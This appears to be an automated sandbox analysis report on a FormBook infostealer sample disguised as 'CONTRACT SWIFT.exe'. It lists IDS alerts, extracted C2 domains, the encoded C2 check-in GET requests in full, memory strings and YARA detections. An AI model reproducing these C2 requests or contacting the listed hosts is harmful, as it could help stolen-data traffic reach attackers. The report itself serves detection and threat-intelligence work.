Source:	Binary string: wntdll.pdb source: RegSvcs.exe, netsh.exe
Source:	Binary string: RegSvcs.pdb source: netsh.exe, 0000000A.00000002.586356219.0000000003C87000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.354327049.000000000F020000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0B4AA1D8
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	1_2_0B4AA1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	5_2_00415681
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 4x nop then pop edi	10_2_03145681

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 208.110.82.29:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 208.110.82.29:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 208.110.82.29:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 217.160.0.220:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 217.160.0.220:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 217.160.0.220:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.ursulaaubri.com/s5cm/

Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&7no=4hLljrWPCjYL HTTP/1.1Host: www.qizhukeji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL HTTP/1.1Host: www.annafelicia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=xBEbFjLoFuodrC/FrIHi+p11i3u3J0p5GQZ8VsaHNTM97bQrkmKUKcAvoM41Kg57v7PXkPt2Cg==&7no=4hLljrWPCjYL HTTP/1.1Host: www.dominatedirectsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL HTTP/1.1Host: www.campingquick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.votelaura.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rtN8zJ9n3ADBSsMwQ==&7no=4hLljrWPCjYL HTTP/1.1Host: www.linjudama.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL HTTP/1.1Host: www.ursulaaubri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.500truyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=yzW/lVzvyQ4hEaPsSPteS4HoLyeRwmnuz4XJRK+qZAqpfbP0DQ0qxoao81SCaQD7KmI2MjNCyA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.ecms2019.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo+Maj0Gmk9CoRfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw==&7no=4hLljrWPCjYL HTTP/1.1Host: www.rnrsans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 192.0.78.25 192.0.78.25

Source: Joe Sandbox View	ASN Name: WIIUS WIIUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View	ASN Name: AUTOMATTICUS AUTOMATTICUS

Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=QmbkDaKiCWkIxq9WLhtviZaKgbI5ygMewBtuG6BOczReuRm3nxGBT9TyrYbv/UczETu56Vlk6A==&7no=4hLljrWPCjYL HTTP/1.1Host: www.qizhukeji.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=hOQz2MSCtbsxDabSpaSii8/BLtQrJH/yS4IrOYS2fNok4Vr2pjerCtCMkXvIPDZ++8b89cNebQ==&7no=4hLljrWPCjYL HTTP/1.1Host: www.annafelicia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=xBEbFjLoFuodrC/FrIHi+p11i3u3J0p5GQZ8VsaHNTM97bQrkmKUKcAvoM41Kg57v7PXkPt2Cg==&7no=4hLljrWPCjYL HTTP/1.1Host: www.dominatedirectsales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=ykmySD41HqpRsFExsLJzaB/DPTfNPkk2Lc0Pz7ATifvot7ncWrGAE7TUgg0cf+ItDyGbmwzT/w==&7no=4hLljrWPCjYL HTTP/1.1Host: www.campingquick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=pvLIMPg9eFmir58zrdlfzpDjY/0Z8Eehky4XMdeWbzjIarYHtSi6dSu8W3U5JLnQBzVy2dgBaA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.votelaura.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=QDP0f9nkNg998lwZsNWJ9sidgDpm9neJ2Jn8Yw6wtNyTzbKtz13+oJch9rtN8zJ9n3ADBSsMwQ==&7no=4hLljrWPCjYL HTTP/1.1Host: www.linjudama.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=9JNYajgHrYbNYbSopvhrVmNk2smeMkdKHCjXrMCuWRZh8vUFvgCDFc1eoPxgVigBOF+8gdpYNg==&7no=4hLljrWPCjYL HTTP/1.1Host: www.ursulaaubri.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=HsBOFNDUa8O5LcaB5EbuTOmydBmLiCE4qYEdmTnH1l0UI2T+HWHUO6KHLkEXg32DLcJSYHPbpA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.500truyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=yzW/lVzvyQ4hEaPsSPteS4HoLyeRwmnuz4XJRK+qZAqpfbP0DQ0qxoao81SCaQD7KmI2MjNCyA==&7no=4hLljrWPCjYL HTTP/1.1Host: www.ecms2019.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo+Maj0Gmk9CoRfrFFa5e3vq65qm4nwUyEHtu+AOd1TMQjYkOCiNEfRCw==&7no=4hLljrWPCjYL HTTP/1.1Host: www.rnrsans.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.qizhukeji.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Mon, 31 May 2021 19:47:31 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7

Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/js/min.js?v2.2
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Left.png)
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/27587/Right.png)
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: http://marsmissionwiki.wikifoundry.com/page/CAMM
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.Rnrsans.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000000.330881685.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/All_Inclusive_Vacation_Packages.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQp
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/Contact_Lens.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVYJZQZ
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/Free_Credit_Report.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8Q
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/Healthy_Weight_Loss.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/Top_Smart_Phones.cfm?fp=jeFOjF7S5%2Fw47R8mU26RbQJ97fTJVQ5%2BQpUGpNdIkfHtD8QVY
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/__media__/design/underconstructionnotice.php?d=rnrsans.com
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/__media__/js/trademark.php?d=rnrsans.com&type=ns
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/display.cfm
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/px.js?ch=1
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/px.js?ch=2
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/s5cm/?IBZlYbB=56Wx/iK0XerXx9sRleo
Source: netsh.exe, 0000000A.00000002.586390200.0000000003E02000.00000004.00000001.sdmp	String found in binary or memory: http://www.rnrsans.com/sk-logabpstatus.php?a=a1Y3UkFVeVRiTlBodXFpOVoxR0NFbExNZWF3aFBMeEs1RGNjTlV0dSs
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.349805749.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Brian151/CAC-Building-Editor
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/leveleditor/CAMM-Crystal-Alien-Map-Maker/issuesVhttps://github.com/Brian151/CAC-U
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/leveleditor/CAMM-Crystal-Alien-Map-MakerNhttp://marsmissionwiki.wikifoundry.com/:
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/leveleditor/CrystAlien-Conflict-Flash-WrapperJhttps://crystalien-redux.com/camm.p
Source: CONTRACT SWIFT.exe, 00000001.00000002.327293465.0000000002881000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Source: CONTRACT SWIFT.exe, 00000001.00000002.326975810.0000000000C2B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.584803050.0000000000A70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.585533620.0000000003130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.329773709.0000000003889000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.390820597.0000000001570000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.390721671.0000000001130000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.390558403.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.325826408.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
